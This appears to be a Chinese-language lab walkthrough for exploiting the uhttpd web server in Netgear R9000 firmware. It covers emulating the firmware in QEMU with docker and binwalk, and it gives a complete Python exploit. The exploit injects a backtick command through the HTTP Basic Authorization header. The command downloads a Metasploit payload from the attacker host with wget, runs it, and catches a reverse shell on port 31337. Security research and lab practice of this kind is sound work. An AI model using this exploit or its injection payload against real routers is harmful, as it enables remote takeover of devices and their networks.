- docker:攻击、调试主机:192.168.2.1
- qemu-system:固件主机:192.168.2.2
- uhttpd(有漏洞 Web 服务器):192.168.2.2:80
- 镜像依赖:
firmianay/ubuntu1604 -> firmianay/qemu-system:armhf
使用 firmianay/binwalk
解压固件:
$ docker run --rm -v $PWD/firmware/:/root/firmware firmianay/binwalk -Mer "/root/firmware/R9000-V1.0.4.26.img"
构建并启动漏洞环境:
# 初始化环境
$ ./init_env.sh arm
# 构建镜像
$ docker-compose -f docker-compose-system.yml build
# 启动容器
$ docker-compose -f docker-compose-system.yml up
# 启动完成后,开启 socks 代理
$ ssh -D 2345 root@127.0.0.1 -p 1234
# 配置浏览器代理,即可登陆 Web 后台 http://192.168.2.2/cgi-bin/
# 漏洞利用
$ python3 tools/exp.py
#!/usr/bin/python3
from pwn import *
from threading import Thread
import requests
import base64
cmd = 'admin:'
cmd += '`'
cmd += 'wget http://192.168.2.1:8000/tools/msf -O /msf\n'
cmd += 'chmod 777 /msf\n'
cmd += '/msf'
cmd += '`'
assert(len(cmd) < 255)
cmd_b64 = base64.b64encode(cmd.encode()).decode()
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Upgrade-Insecure-Requests": "1",
"Authorization": "Basic " + cmd_b64
}
def attack():
try:
requests.get("http://192.168.2.2/cgi-bin/", headers=headers, timeout=1)
except Exception as e:
print(e)
thread = Thread(target=attack)
thread.start()
io = listen(31337)
io.wait_for_connection()
log.success("getshell")
io.interactive()
thread.join()